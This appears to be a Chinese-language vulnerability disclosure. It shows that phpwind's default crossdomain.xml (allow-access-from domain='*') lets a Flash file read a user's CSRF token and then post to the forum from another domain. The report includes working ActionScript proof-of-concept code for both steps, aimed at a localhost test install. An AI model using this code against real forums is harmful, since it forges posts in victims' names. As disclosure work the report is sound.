### 简要描述:
phpwind配置不当可导致CSRF发帖
### 详细说明:
crossdomain.xml的默认设置:
```
<?xml version="1.0"?>
-<cross-domain-policy> <allow-access-from domain="*"/>
<!-- flash跨域策略,domain建议设置为 *.你的站点域名 -->
</cross-domain-policy>
```
虽然有建议 但是普通站长谁没事改这个啊,还不如你们在安装时直接根据host重写下crossdomain.xml得了。
先取到csrf的token
[<img src="https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png" alt="Q.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png)
```
function gethash() {
function getformhash(txt) {
txt = txt.split('csrf_token" value="')[1].split('"')[0];
return txt;
}
var result_lv:LoadVars = new LoadVars();
result_lv.onData = function(txt) {
if (txt) {
txt = getformhash(txt);
} else {
txt = "Error connecting to server.";
}
trace(txt);
};
var send_lv:LoadVars = new LoadVars();
method = 'GET';
url = "http://localhost:8080/index.php?c=post&fid=2";
send_lv.sendAndLoad(url,result_lv,method);
}
gethash()
```
然后csrf发帖 pw这里甚至没有对refer进行检查 可以直接外域提交
[<img src="https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png" alt="Q57.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png)
```
function dopost() {
var result_lv:LoadVars = new LoadVars();
result_lv.onData = function(txt) {
trace(txt);
};
var send_lv:LoadVars = new LoadVars();
method = 'post';
url = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2";
send_lv['csrf_token'] = '{{ csrf_token }}';
send_lv['atc_title'] = '1380343694';
send_lv['atc_content'] = '12112123123sdf1';
send_lv['pid'] = '';
send_lv['tid'] = '';
send_lv['special'] = 'default';
send_lv.sendAndLoad(url,result_lv,method);
}
dopost()
```
### 漏洞证明:
京公网安备 11010502034610号
暂无评论